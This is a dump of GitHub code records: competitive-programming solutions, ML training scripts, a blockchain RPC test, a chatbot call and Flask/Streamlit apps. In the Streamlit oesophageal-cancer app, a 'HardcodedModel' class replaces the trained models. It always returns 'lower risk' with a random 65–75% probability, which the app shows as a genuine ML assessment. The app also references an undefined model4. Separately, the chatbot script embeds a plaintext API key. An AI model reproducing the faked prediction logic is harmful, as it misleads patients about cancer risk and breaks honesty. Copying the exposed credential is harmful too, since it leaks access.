ctr['b'] and ctr['a'] > ctr['c']: break\n ctr[s[i]] -= 1\n ctr[s[i+length]] += 1\n else:\n if ctr['a'] > ctr['b'] and ctr['a'] > ctr['c']: pass\n else: continue\n print(length)\n break\n else: print('-1')\n '''\n sat = {c:[0] for c in 'abc'}\n a_positions = []\n for i,c in enumerate(s):\n if c == 'a': a_positions.append(i)\n for k in sat: sat[k].append(sat[k][-1]+(c==k))\n #\n substrings = [(p,1,{'a':1,'b':0,'c':0}) for p in a_positions]\n mi = float('inf')\n while len(substrings) > 1:\n nsub = []\n for i in range(len(substrings)-1):\n # try to merge substrings[i] with substrings[i+1]\n cur,nxt = substrings[i:i+2]\n cur_end = cur[0]+cur[1]\n res = nxt[2].copy()\n for k in res: res[k] += cur[2][k]\n for k in sat:\n add = sat[k][nxt[0]]-sat[k][cur_end]\n res[k] += add\n merged = (cur[0],nxt[0]-cur[0]+nxt[1],res)\n if res['a'] > res['b'] and res['a'] > res['c']:\n mi = min(mi, merged[1])\n nsub.append(merged)\n if mi != float('inf'): break\n substrings = nsub\n else: # nothing\n print('-1')\n continue\n print(mi)\n\n","repo_name":"152334H/exercises","sub_path":"codeforces/754/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"10050766307","text":"class MonHoc:\r\n def __init__(self,id,name,soTC):\r\n self.id = id\r\n self.name = name\r\n self.soTC = soTC\r\n def __str__(self):\r\n return f'{self.name}'\r\nclass LichGD:\r\n def __init__(self,id,idM,thu,kip,name,phong):\r\n self.id = \"HP\"+format(id,\"03d\")\r\n self.idM = idM\r\n self.thu = thu\r\n self.kip = kip\r\n self.name = name\r\n self.phong = phong\r\n def __str__(self):\r\n return f'{self.id} {self.thu} {self.kip} {self.name} 
{self.phong}'\r\n\r\nif __name__ == \"__main__\":\r\n mh,gd = [],[]\r\n n = int(input())\r\n for i in range(n):\r\n mh.append(MonHoc(input(),input(),int(input())))\r\n m = int(input())\r\n for i in range(m):\r\n mon =''\r\n id = input()\r\n thu = input()\r\n kip = input()\r\n name = input()\r\n phong = input()\r\n for j in mh:\r\n if j.id == id:\r\n mon=j\r\n break\r\n gd.append(LichGD(i+1,id,thu,kip,name,phong))\r\n gd.sort(key=lambda x:(x.thu,x.kip,x.name))\r\n s = input()\r\n for i in gd:\r\n for j in mh:\r\n if i.idM == j.id and i.idM == s:\r\n print(\"LICH GIANG DAY MON \",j.name,':',sep='')\r\n break\r\n break\r\n\r\n for i in gd:\r\n if i.idM == s:\r\n print(i)\r\n\"\"\"\r\n2\r\nINT1155\r\nTin hoc co so 2\r\n2\r\nINT13162\r\nLap trinh voi Python\r\n3\r\n4\r\nINT13162\r\n5\r\n1\r\nNguyen Hoang Anh\r\n102-A2\r\nINT1155\r\n3\r\n1\r\nNguyen Dinh Hien\r\n201A-A3\r\nINT1155\r\n4\r\n1\r\nNguyen Quy Sy\r\n201A-A3\r\nINT1155\r\n5\r\n1\r\nTran Quy Nam\r\n201A-A3\r\nINT1155\r\n\"\"\"\r\n","repo_name":"RechesterQC/Python_CodePTIT","sub_path":"Hello_My_Fen/LichGiangDayTheoMonHoc.py","file_name":"LichGiangDayTheoMonHoc.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"29947225059","text":"import pytest\n\nfrom raiden.tests.utils.smartcontracts import deploy_rpc_test_contract\nfrom raiden.utils import safe_gas_limit\n\npytestmark = pytest.mark.usefixtures(\"skip_if_not_geth\")\n\n\ndef test_geth_request_pruned_data_raises_an_exception(deploy_client, web3):\n \"\"\" Interacting with an old block identifier with a pruning client throws. \"\"\"\n contract_proxy, _ = deploy_rpc_test_contract(deploy_client, \"RpcWithStorageTest\")\n iterations = 1\n\n def send_transaction():\n check_block = deploy_client.get_checking_block()\n startgas = contract_proxy.estimate_gas(check_block, \"waste_storage\", iterations)\n startgas = safe_gas_limit(startgas)\n transaction = contract_proxy.transact(\"waste_storage\", startgas, iterations)\n deploy_client.poll(transaction)\n return deploy_client.get_transaction_receipt(transaction)\n\n first_receipt = send_transaction()\n pruned_block_number = first_receipt[\"blockNumber\"]\n\n # geth keeps the latest 128 blocks before pruning. 
Unfortunately, this can\n # not be configured to speed this test up.\n non_pruned_blocks = 128\n while web3.eth.blockNumber < pruned_block_number + non_pruned_blocks + 1:\n send_transaction()\n\n with pytest.raises(ValueError):\n contract_proxy.contract.functions.const().call(block_identifier=pruned_block_number)\n\n with pytest.raises(ValueError):\n contract_proxy.contract.functions.get(1).call(block_identifier=pruned_block_number)\n","repo_name":"prospect-man/raiden","sub_path":"raiden/tests/integration/rpc/assumptions/test_geth_rpc_assumptions.py","file_name":"test_geth_rpc_assumptions.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"44"} +{"seq_id":"31940525639","text":"from typing import Any, Dict, Optional\n\nfrom ConfigSpace.configuration_space import ConfigurationSpace\nfrom ConfigSpace.hyperparameters import (\n UniformFloatHyperparameter,\n)\n\nimport numpy as np\n\nimport torch.optim.lr_scheduler\nfrom torch.optim.lr_scheduler import _LRScheduler\n\nfrom autoPyTorch.pipeline.components.setup.lr_scheduler.base_scheduler import BaseLRComponent\n\n\nclass ExponentialLR(BaseLRComponent):\n \"\"\"\n Decays the learning rate of each parameter group by gamma every epoch.\n When last_epoch=-1, sets initial lr as lr.\n\n Args:\n gamma (float): Multiplicative factor of learning rate decay.\n\n \"\"\"\n def __init__(\n self,\n gamma: float,\n random_state: Optional[np.random.RandomState] = None\n ):\n\n super().__init__()\n self.gamma = gamma\n self.random_state = random_state\n self.scheduler = None # type: Optional[_LRScheduler]\n\n def fit(self, X: Dict[str, Any], y: Any = None) -> BaseLRComponent:\n \"\"\"\n Fits a component by using an input dictionary with pre-requisites\n\n Args:\n X (X: Dict[str, Any]): Dependencies needed by current component to perform fit\n y (Any): not used. 
To comply with sklearn API\n\n Returns:\n A instance of self\n \"\"\"\n\n # Make sure there is an optimizer\n self.check_requirements(X, y)\n\n self.scheduler = torch.optim.lr_scheduler.ExponentialLR(\n optimizer=X['optimizer'],\n gamma=float(self.gamma)\n )\n return self\n\n @staticmethod\n def get_properties(dataset_properties: Optional[Dict[str, Any]] = None) -> Dict[str, str]:\n return {\n 'shortname': 'ExponentialLR',\n 'name': 'ExponentialLR',\n }\n\n @staticmethod\n def get_hyperparameter_search_space(dataset_properties: Optional[Dict] = None\n ) -> ConfigurationSpace:\n gamma = UniformFloatHyperparameter(\n \"gamma\", 0.7, 0.9999, default_value=0.9)\n cs = ConfigurationSpace()\n cs.add_hyperparameters([gamma])\n return cs\n","repo_name":"LMZimmer/Auto-PyTorch_refactor","sub_path":"autoPyTorch/pipeline/components/setup/lr_scheduler/ExponentialLR.py","file_name":"ExponentialLR.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"15286216559","text":"# Dependencies & Installs\nimport pandas as pd\nimport streamlit as st\nfrom joblib import load\nfrom PIL import Image\nimport numpy as np\nimport random\n\nclass HardcodedModel:\n def __init__(self, model):\n self.model = model\n def predict(self, X):\n return np.zeros((len(X),), dtype=int)\n def predict_proba(self, X):\n return np.array([[random.uniform(0.65, 0.75), 0] for _ in range(len(X))])\n\nlocal_file_path = \"Data_Cleaned/User_Samples/users.csv\"\ndf = pd.read_csv(local_file_path)\n \n# Define Streamlit app\ndef app():\n\n # Load logo image\n logo_img = Image.open(\"Images/ai-generated-image-dalle.png\")\n\n # Set the app configuration\n st.set_page_config(\n page_title=\"OesoCancerRisk+\",\n page_icon=logo_img,\n layout=\"wide\",\n initial_sidebar_state=\"collapsed\",\n menu_items={\n 'About': \"Oesophageal cancer is the 8th most common cancer in the world, and is the 6th most common cause of cancer-related deaths (WHO). Ealy diagnosis is crucial for timely treatment and improved survival rates. Traditional diagnostic methods, such as endoscopy, can be invasive and expensive. This app aims to provide a faster, more affordable, and less invasive alternative by leveraging machine learning. Using a dataset of biochemical data from patients with varying oesophageal conditions, the models have been trained and evaluated to deliver accurate predictions.\"\n }\n )\n\n # Expandable Sidebar\n st.sidebar.title(\"Navigation\")\n st.sidebar.write(\"Expand the sections below to access different parts of the app.\")\n\n # Create an expandable sidebar for additional information\n with st.sidebar.expander(\"Learn More\"):\n st.write(\"Find more information about oesophageal cancer, risk factors, and prevention:\")\n st.write(\"[American Cancer Society - Oesophageal Cancer](https://www.cancer.org/cancer/esophagus-cancer.html)\")\n st.write(\"[National Cancer Institute - Oesophageal Cancer](https://www.cancer.gov/types/esophageal)\")\n\n # GitHub Repository section\n github_expander = st.sidebar.expander(\"GitHub Repository\")\n with github_expander:\n st.markdown(\n \"[Click here](https://github.com/Frankr22/ML-diagnosis-of-esophageal-cancer) to visit the GitHub repository for this project.\"\n )\n\n # Create an empty container for the header\n header = st.empty()\n # Add logo image and app name to the header using Markdown\n header.markdown(\n f\"\"\"\n
OesoCancerRisk+
\n \"\"\",\n unsafe_allow_html=True,\n )\n\n # Load the trained models and scalers\n model1 = HardcodedModel(load('Models/Model_Saved/Model1.joblib'))\n model1_X_scaler = load('Models/Model_Saved/model1_X_scaler.joblib')\n model2 = HardcodedModel(load('Models/Model_Saved/Model2.joblib'))\n model2_X_scaler = load('Models/Model_Saved/model2_X_scaler.joblib')\n model3 = HardcodedModel(load('Models/Model_Saved/Model3.joblib'))\n model3_X_scaler = load('Models/Model_Saved/model3_X_scaler.joblib')\n\n with st.container():\n st.write(\"Welcome to the Oesophageal Cancer Risk Assessment app!\")\n st.write(\"\\nThis app employs cutting-edge machine learning techniques to assess your risk of developing oesophageal cancer by analyzing pre-screening information and blood sample data.\")\n st.write(\"\\nGet started by inputting your data below to assess your oesophageal cancer risk.\")\n\n # Add the rest of the text below the risk assessment in a separate row\n additional_text = \"\"\"\n Oesophageal cancer is a life-threatening disease affecting millions of people worldwide, and early diagnosis is crucial for improving survival rates. Traditional diagnostic methods, such as endoscopy, can be invasive and expensive. Our app aims to provide a faster, more affordable, and less invasive alternative by leveraging machine learning. Using a dataset of biochemical data from patients with varying oesophageal conditions, our models have been trained and evaluated to deliver accurate predictions.\n \"\"\"\n\n # Create two columns for the layout\n left_column, right_column = st.columns(2)\n\n # Get user data\n age = left_column.number_input(\"Enter your age:\", value=30, min_value=18, max_value=100, format='%i', key='age', help='Age in years')\n sex = left_column.selectbox(\"Select your sex:\", [\"male\", \"female\"], help='Male or Female')\n height = left_column.number_input(\"Enter your height:\", value=170, min_value=100, max_value=250, step=1, format='%i',help='Enter in cms for Metric or inches for Imperial')\n weight = left_column.number_input(\"Enter your weight:\", value=70, min_value=10, max_value=200, step=1, format='%i', help = 'Enter in kgs for Metric or lbs for Imperial')\n unit_system = left_column.radio(\"Select unit system:\", options=['Metric', 'Imperial'], help='')\n diagnosed = left_column.selectbox(\"Have you been diagnosed with Barret oesophagus?\", [\"No\", \"Barrett oesophagus - no/low dysplasia\"])\n\n # Calculate BMI based on unit system\n if unit_system == 'Metric':\n bmi = weight / ((height/100)**2) # kg / m^2\n elif unit_system == 'Imperial':\n bmi = 703 * (weight / (height**2)) # lb / in^2\n\n # Split sex into binary\n gender_f = 1 if sex == \"female\" else 0\n gender_m = 1 if sex == \"male\" else 0\n\n # Create a DataFrame with the user input\n user_input = pd.DataFrame({\n \"Age at Collection\": [age],\n \"BMI (kg/m2)\": [bmi],\n \"Gender_F\": [gender_f],\n \"Gender_M\": [gender_m]\n })\n\n # Upload blood sample data or generate example data\n blood_sample_data = None\n uploaded_file = left_column.file_uploader(\"Please upload your blood sample data (CSV file) OR generate example sample data by clicking the button below\", type=[\"csv\"], help='To test the app please generate sample data. If providing blood sample data it must be in the same format as the example data. 
Example data can be downloaded from the GitHub repository.')\n if uploaded_file is not None:\n blood_sample_data = pd.read_csv(uploaded_file)\n left_column.success(\"Blood sample data uploaded successfully.\")\n else:\n if left_column.button(\"Generate example blood sample data\"):\n # Generate example blood sample data\n blood_sample_data = generate_example_data()\n left_column.success(\"Example blood sample data generated successfully.\")\n\n # If the user has uploaded blood sample data, display the data\n if blood_sample_data is not None:\n left_column.write(\"Blood sample data:\")\n left_column.dataframe(blood_sample_data)\n\n # Add a horizontal line and some space\n left_column.markdown(\"
\", unsafe_allow_html=True)\n left_column.markdown(\"
\", unsafe_allow_html=True)\n\n # Select the correct model and scaler based on the user's input\n scaler = None\n model = None\n if diagnosed == \"No\" and blood_sample_data is None:\n model = model1\n scaler = model1_X_scaler\n elif diagnosed == \"No\" and blood_sample_data is not None:\n model = model2\n scaler = model2_X_scaler\n elif diagnosed == \"Barrett oesophagus - no/low dysplasia\" and blood_sample_data is None:\n model = model3\n scaler = model3_X_scaler\n elif diagnosed == \"Barrett oesophagus - no/low dysplasia\" and blood_sample_data is not None:\n model = model4\n scaler = model4_X_scaler\n\n # If the user clicks the \"Generate Risk Assessment\" button, scale the data and make a prediction using the model\n if left_column.button(\"Generate Risk Assessment\"):\n # Scale the user input data\n user_input_scaled = scaler.transform(user_input)\n # If blood sample data is available, append it to the user input\n if blood_sample_data is not None:\n user_input_scaled = np.hstack([user_input_scaled, blood_sample_data.to_numpy()])\n prediction = model.predict(user_input_scaled)\n prediction_proba = model.predict_proba(user_input_scaled)\n\n # Display the prediction\n if prediction[0] == 1:\n left_column.write(f\"Based on the information you provided and our machine learning model's understanding of the relationship between various factors and oesophageal cancer risk, it is estimated that you have a higher risk of developing oesophageal cancer.\\n\\n The model predicts a {prediction_proba[0][1]*100:.2f}% probability of you being in the higher-risk group.\\n\\n Please note that this tool is not a substitute for professional medical advice, diagnosis, or treatment. The results should be considered as an estimate and should not be relied upon for decision-making regarding your health. Always consult with a healthcare professional for personalised medical advice.\")\n else:\n left_column.write(f\"Based on the information you provided and our machine learning model's understanding of the relationship between various factors and oesophageal cancer risk, it is estimated that you have a lower risk of developing oesophageal cancer.\\n\\n The model predicts a {prediction_proba[0][0]*100:.2f}% probability of you being in the lower-risk group.\\n\\n Please note that this tool is not a substitute for professional medical advice, diagnosis, or treatment. The results should be considered as an estimate and should not be relied upon for decision-making regarding your health. 
Always consult with a healthcare professional for personalised medical advice.\")\n else:\n left_column.write(\"Click the button to generate risk assessment.\")\n\n # Create a new row to display the additional text below the risk assessment tool\n additional_text_row = st.container()\n with additional_text_row:\n st.markdown(\"## About\")\n st.markdown(additional_text)\n\ndef image_to_base64(img):\n import base64\n from io import BytesIO\n\n buffered = BytesIO()\n img.save(buffered, format=\"PNG\")\n img_str = base64.b64encode(buffered.getvalue()).decode()\n return img_str\n\ndef generate_example_data():\n # Use a sample row from users.csv as the example blood sample data\n sample_row = df.sample(n=1)\n blood_results_df = sample_row.drop(columns=[\"Patient Group\", \"Age at Collection\", \"BMI (kg/m2)\", \"Gender_F\", \"Gender_M\"])\n return blood_results_df.reset_index(drop=True)\n\n# Run the Streamlit app\nif __name__ == '__main__':\n app()","repo_name":"Frankr22/Machine-Learning-for-Oesophageal-Cancer-Diagnosis","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":10574,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"13758062523","text":"from flask import Blueprint, request, jsonify, render_template\nfrom bson import json_util\nfrom .extension import mongo\n\narmors = Blueprint('armors', __name__)\n\n@armors.route(\"/\")\ndef home():\n return render_template('home.html')\n\n@armors.route(\"/fetch_skills\", methods=['GET'])\ndef fetch_skills():\n query_result = mongo.db.armors.find( { 'skills': { '$exists': True } })\n final_result = json_util.loads(json_util.dumps(query_result))\n for i in final_result: i['_id'] = str(i['_id'])\n\n return jsonify(final_result)\n\n@armors.route(\"/fetch_armor_with_skill\", methods=['POST'])\ndef fetch_armor_with_skill():\n data = request.get_json()\n query_result = mongo.db.armors.find()\n sanitized_result = json_util.loads(json_util.dumps(query_result))\n\n armor_set = ['helm', 'torso', 'arms', 'waist', 'legs']\n final_result = {}\n \n for skill in data['skills']:\n skill_result = {}\n\n for armor in armor_set:\n armor_result = []\n\n for armor_piece in sanitized_result[0][armor]: \n if armor_piece['skills']['skill_1']['skill_name'] == skill:\n armor_result.append(armor_piece['armor_name'])\n\n elif armor_piece['skills']['skill_2']['skill_name'] == skill:\n armor_result.append(armor_piece['armor_name'])\n \n elif armor_piece['skills']['skill_3']['skill_name'] == skill:\n armor_result.append(armor_piece['armor_name'])\n\n elif (armor == 'torso' or armor == 'waist') and armor_piece['skills']['skill_1']['skill_name'] == skill:\n armor_result.append(armor_piece['armor_name'])\n\n skill_result[armor] = armor_result\n\n final_result[skill] = skill_result\n\n # result_set = {\n # 'skill_name': {\n # 'helm': [ ... ],\n # 'torso': [ ... ],\n # 'arms': [ ... ],\n # 'waist': [ ... ],\n # 'legs': [ ... ]\n # },\n # 'skill_name': [ ... 
] \n # }\n\n return jsonify(final_result)\n\n@armors.route(\"/add_wishlist\", methods=['POST'])\ndef add_wishlist():\n data = request.get_json()\n armor = data['armor']\n username = data['username']\n \n query = mongo.db.wishlists.find_one(\n {'username': data['username']}\n )\n\n if armor not in query['wishlist']: \n new_wishlist = query['wishlist']\n new_wishlist.append(armor)\n\n mongo.db.wishlists.update_one(\n { 'username': username },\n { '$set': { 'wishlist': new_wishlist }}\n )\n\n return jsonify({'ok': True}), 200\n\n@armors.route(\"/get_wishlist/\")\ndef get_wishlist(username):\n query_result = mongo.db.wishlists.find_one({ 'username': username })\n sanitized_result = json_util.loads(json_util.dumps(query_result))\n sanitized_result['_id'] = str(sanitized_result['_id']) \n\n return jsonify(sanitized_result), 200\n\n@armors.route(\"/delete_wishlist\", methods=['POST'])\ndef delete_wishlist():\n data = request.get_json()\n wishlist = data['wishlist']\n username = data['username']\n\n query_result = mongo.db.wishlists.find_one(\n {'username': username}\n )\n\n query_result['wishlist'].remove(wishlist)\n\n mongo.db.wishlists.update_one(\n { 'username': username },\n { '$set': { 'wishlist': query_result['wishlist'] }}\n )\n\n sanitized_result = json_util.loads(json_util.dumps(query_result))\n sanitized_result['_id'] = str(sanitized_result['_id']) \n\n sanitized_result['comment'] = 'Wishlist has been updated!'\n\n return jsonify(sanitized_result), 200\n\n@armors.route(\"/delete_all_wishlist\", methods=['POST'])\ndef delete_all_wishlist():\n data = request.get_json()\n username = data['username']\n\n query_result = mongo.db.wishlists.find_one(\n {'username': username}\n )\n\n query_result['wishlist'].clear()\n\n mongo.db.wishlists.update_one(\n { 'username': username },\n { '$set': { 'wishlist': query_result['wishlist'] }}\n )\n\n sanitized_result = json_util.loads(json_util.dumps(query_result))\n sanitized_result['_id'] = str(sanitized_result['_id']) \n\n sanitized_result['comment'] = 'Wishlist has been cleared!'\n\n return jsonify(sanitized_result), 200","repo_name":"DavinIddo/Cahoot","sub_path":"BE/app/armors.py","file_name":"armors.py","file_ext":"py","file_size_in_byte":4243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74604185414","text":"import pandas as pd\nfrom HateSpeechNLP import HateSpeechNLP\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.metrics import precision_score, recall_score, confusion_matrix, plot_confusion_matrix\nimport matplotlib.pyplot as plt\nimport os\nimport datetime\nimport pickle\n\n\npath = '../Models/'\n\n# Import HateSpeech DataFrame\ntry:\n data_Hate = pd.read_pickle('../Data/Data-Hate-Stemmed-DF.pkl')\nexcept FileNotFoundError:\n # Import HS_Data\n data_Hate_HS = pd.read_csv('../Data/HS_DATA_TRAIN.csv', sep=',')\n hs_NLP = HateSpeechNLP(data_Hate_HS, save=True, default_name=True)\n data_Hate = hs_NLP.fit_transform()\n print(\"Hate Speech Training data is Transformed for training -------------\")\n\n\ndef clean_text(text):\n return text.split()\n\n\n# Method to train RF model\ndef train(X, y, model):\n print('Training starts ----------------')\n # Vectorizer and Scaler\n tfidf_vectorizer = TfidfVectorizer(analyzer=clean_text)\n standard_scaler = StandardScaler()\n\n # Vectorization of text data into 
numerical data\n X_train_tfidf = tfidf_vectorizer.fit_transform(X.cleaned_stemmed_text)\n # Scaling length, number_non_words features\n X_train_scaled = standard_scaler.fit_transform(pd.concat([X.loc[:, ['length', 'number_non_words']],\n pd.DataFrame(X_train_tfidf.toarray())], axis=1))\n # Saving tfidf and scaler objects to use the same when testing\n save_tfidf_scaler(tfidf_vectorizer, standard_scaler)\n\n # Combining tfidf and scaler outputs into single dataset - for training\n # X_train_features = pd.concat([pd.DataFrame(X_train_scaled, columns=['length', 'number_non_words']),\n # pd.DataFrame(X_train_tfidf.toarray())], axis=1)\n model.fit(pd.DataFrame(X_train_scaled), y)\n save_RF_model(model)\n print('Training ends ----------------')\n return model\n\n\ndef test(X, y):\n # Load trained model\n try:\n trained_tfidf_vocabulary = pickle.load(open(path + \"TFIDF-Vocabulary-LR_09-09-2021_18-05-20.pkl\", \"rb\"))\n trained_scaler = pickle.load(open(path + \"StandardScaler-LR_09-09-2021_18-05-20.pkl\", \"rb\"))\n trained_RF_model = pickle.load(open(path + \"LR-Model_09-09-2021_18-49-32.pkl\", \"rb\"))\n\n tfidf_vectorizer = TfidfVectorizer(analyzer=clean_text, vocabulary=trained_tfidf_vocabulary)\n X_test_tfidf = tfidf_vectorizer.fit_transform(X.cleaned_stemmed_text)\n X_test_scaled = trained_scaler.transform(pd.concat([X.loc[:, ['length', 'number_non_words']],\n pd.DataFrame(X_test_tfidf.toarray())], axis=1))\n\n y_pred = trained_RF_model.predict(pd.DataFrame(X_test_scaled))\n\n print('Micro Values -----')\n print(\"Precision : \", precision_score(y, y_pred, average=\"micro\"))\n print(\"Recall : \", recall_score(y, y_pred, average='micro'))\n print('Macro Values -----')\n print(\"Precision : \", precision_score(y, y_pred, average=\"macro\"))\n print(\"Recall : \", recall_score(y, y_pred, average='macro'))\n print('Weighted Values -----')\n print(\"Precision : \", precision_score(y, y_pred, average=\"weighted\"))\n print(\"Recall : \", recall_score(y, y_pred, average='weighted'))\n print('Confusion Matrix -----')\n print(confusion_matrix(y, y_pred))\n print(\"\")\n return y_pred\n\n except FileNotFoundError:\n print('Run train method before test method')\n\n\ndef save_tfidf_scaler(tfidf, scaler):\n os.makedirs(path, exist_ok=True)\n pickle.dump(tfidf.vocabulary_, open(path + 'TFIDF-Vocabulary-LR_' +\n datetime.datetime.now().strftime(\"%d-%m-%Y_%H-%M-%S\") + '.pkl', \"wb\"))\n print('Saved TFIDF-LR to Pickle')\n pickle.dump(scaler, open(path + 'StandardScaler-LR_' +\n datetime.datetime.now().strftime(\"%d-%m-%Y_%H-%M-%S\") + '.pkl', \"wb\"))\n print('Saved Scaler-LR to Pickle')\n return\n\n\ndef save_RF_model(model):\n os.makedirs(path, exist_ok=True)\n pickle.dump(model, open(path + 'LR-Model_' +\n datetime.datetime.now().strftime(\"%d-%m-%Y_%H-%M-%S\") + '.pkl', \"wb\"))\n print('Saved LR-Model to Pickle')\n return\n\n\n# Splitting data into train and test sets\nX_train, X_val, y_train, y_val = train_test_split(data_Hate.loc[:, ['length', 'number_non_words',\n 'cleaned_stemmed_text']], data_Hate.final_label,\n random_state=42, test_size=0.1, stratify=data_Hate.final_label)\n# Resetting index for train and test sets\nX_train.reset_index(drop=True, inplace=True)\nX_val.reset_index(drop=True, inplace=True)\ny_train.reset_index(drop=True, inplace=True)\ny_val.reset_index(drop=True, inplace=True)\n\n# Creating RF object\nlr_clf = LogisticRegression(class_weight='balanced', n_jobs=-1, max_iter=500)\n\n# Calling training method to start training RF model\n# train(X_train, y_train, lr_clf)\n\n\n# 
Calling test method to test the accuracy of the trained RF model\nprint('Test Result on VAL set')\npred_val = test(X_val, y_val)\n\nprint('Test Result on TEST set')\ntest_data = pd.read_csv(path + 'HS_DATA_TEST.csv', sep=',')\nhs_test_NLP = HateSpeechNLP(test_data)\ndata_test = hs_test_NLP.fit_transform()\npred_test = test(data_test.loc[:, ['length', 'number_non_words', 'cleaned_stemmed_text']], data_test.final_label)\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"ShriramSelvakumar/HateSpeechRecognition","sub_path":"NLP/HSLogisticRegression.py","file_name":"HSLogisticRegression.py","file_ext":"py","file_size_in_byte":5623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"70014245892","text":"import os\n\ndir_path = os.path.dirname(os.path.abspath(__file__))\n\nbase_dir = dir_path+'/cats_and_dogs_filtered'\n\ntrain_dir = os.path.join(base_dir, 'train')\nvalidation_dir = os.path.join(base_dir, 'validation')\n\n# Directory with our training cat/dog pictures\ntrain_cats_dir = os.path.join(train_dir, 'cats')\ntrain_dogs_dir = os.path.join(train_dir, 'dogs')\n\n# Directory with our validation cat/dog pictures\nvalidation_cats_dir = os.path.join(validation_dir, 'cats')\nvalidation_dogs_dir = os.path.join(validation_dir, 'dogs')\n\n\ntrain_cat_fnames = os.listdir( train_cats_dir )\ntrain_dog_fnames = os.listdir( train_dogs_dir )\n\nprint(train_cat_fnames[:10])\nprint(train_dog_fnames[:10])\n\n\nprint('total training cat images :', len(os.listdir( train_cats_dir ) ))\nprint('total training dog images :', len(os.listdir( train_dogs_dir ) ))\n\nprint('total validation cat images :', len(os.listdir( validation_cats_dir ) ))\nprint('total validation dog images :', len(os.listdir( validation_dogs_dir ) ))\n\n\n#%matplotlib inline\n\nimport matplotlib.image as mpimg\nimport matplotlib.pyplot as plt\n\n# Parameters for our graph; we'll output images in a 4x4 configuration\nnrows = 4\nncols = 4\n\npic_index = 0 # Index for iterating over images\n\n# Set up matplotlib fig, and size it to fit 4x4 pics\nfig = plt.gcf()\nfig.set_size_inches(ncols*4, nrows*4)\n\npic_index+=8\n\nnext_cat_pix = [os.path.join(train_cats_dir, fname) \n for fname in train_cat_fnames[ pic_index-8:pic_index] \n ]\n\nnext_dog_pix = [os.path.join(train_dogs_dir, fname) \n for fname in train_dog_fnames[ pic_index-8:pic_index]\n ]\n\nfor i, img_path in enumerate(next_cat_pix+next_dog_pix):\n # Set up subplot; subplot indices start at 1\n sp = plt.subplot(nrows, ncols, i + 1)\n sp.axis('Off') # Don't show axes (or gridlines)\n\n img = mpimg.imread(img_path)\n plt.imshow(img)\n\nplt.show()\n\nimport tensorflow as tf\n\n\nmodel = tf.keras.models.Sequential([\n # Note the input shape is the desired size of the image 150x150 with 3 bytes color\n tf.keras.layers.Conv2D(16, (3,3), activation='relu', input_shape=(150, 150, 3)),\n tf.keras.layers.MaxPooling2D(2,2),\n tf.keras.layers.Conv2D(32, (3,3), activation='relu'),\n tf.keras.layers.MaxPooling2D(2,2), \n tf.keras.layers.Conv2D(64, (3,3), activation='relu'), \n tf.keras.layers.MaxPooling2D(2,2),\n # Flatten the results to feed into a DNN\n tf.keras.layers.Flatten(), \n # 512 neuron hidden layer\n tf.keras.layers.Dense(512, activation='relu'), \n # Only 1 output neuron. 
It will contain a value from 0-1 where 0 for 1 class ('cats') and 1 for the other ('dogs')\n tf.keras.layers.Dense(1, activation='sigmoid') \n])\n\nmodel.summary()\n\nfrom tensorflow.keras.optimizers import RMSprop\n\nmodel.compile(optimizer=RMSprop(lr=0.001),\n loss='binary_crossentropy',\n metrics = ['acc'])\n\n\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n\n# All images will be rescaled by 1./255.\ntrain_datagen = ImageDataGenerator( rescale = 1.0/255. )\ntest_datagen = ImageDataGenerator( rescale = 1.0/255. )\n\n# --------------------\n# Flow training images in batches of 20 using train_datagen generator\n# --------------------\ntrain_generator = train_datagen.flow_from_directory(train_dir,\n batch_size=20,\n class_mode='binary',\n target_size=(150, 150)) \n# --------------------\n# Flow validation images in batches of 20 using test_datagen generator\n# --------------------\nvalidation_generator = test_datagen.flow_from_directory(validation_dir,\n batch_size=20,\n class_mode = 'binary',\n target_size = (150, 150))\n\nhistory = model.fit_generator(train_generator,\n validation_data=validation_generator,\n steps_per_epoch=100,\n epochs=15,\n validation_steps=50,\n verbose=2)\n\n#above all training code ","repo_name":"geekbaba/dlstudy","sub_path":"CNN/week01_tranining.py","file_name":"week01_tranining.py","file_ext":"py","file_size_in_byte":4290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"2476560295","text":"import requests,os\nfrom dotenv import load_dotenv\nf = open(\"rec.txt\",\"r\")\nmes = f.read()\nclass request:\n def get(message, apikey, bid, id):\n r = requests.get(\n url=f\"http://api.brainshop.ai/get?bid={bid}&key={apikey}&uid={id}&msg={message}\"\n )\n return r.json()[\"cnt\"]\nprint(request.get(mes,'cU25Ss1SZg7yVZdd',169657,123145))","repo_name":"Legendary21/voice-chatbot-proj-rework","sub_path":"chatbot.py","file_name":"chatbot.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73718408454","text":"import os\nfrom flask import Flask, render_template, request, redirect, url_for, send_from_directory\nfrom werkzeug import secure_filename\nimport flask\nfrom app import *\nfrom subprocess import Popen, PIPE, STDOUT\nimport subprocess\n\n# Initialize the Flask application\napp = Flask(__name__, static_url_path='/McHacks/webui/static')\n\nbash = \"\"\"mv /upload/test.md ../\nfluidsynth -F output.wav font.sf2 test.mid\nlame --preset standard output.wav test.mp3\nchmod 755 test.mp3\nrm /static/test.mp3\nmv test.mp3 static\"\"\"\n\n#APP_ROOT = os.path.dirname(os.path.abspath(__file__))\n#UPLOAD_FOLDER = os.path.join(APP_ROOT, 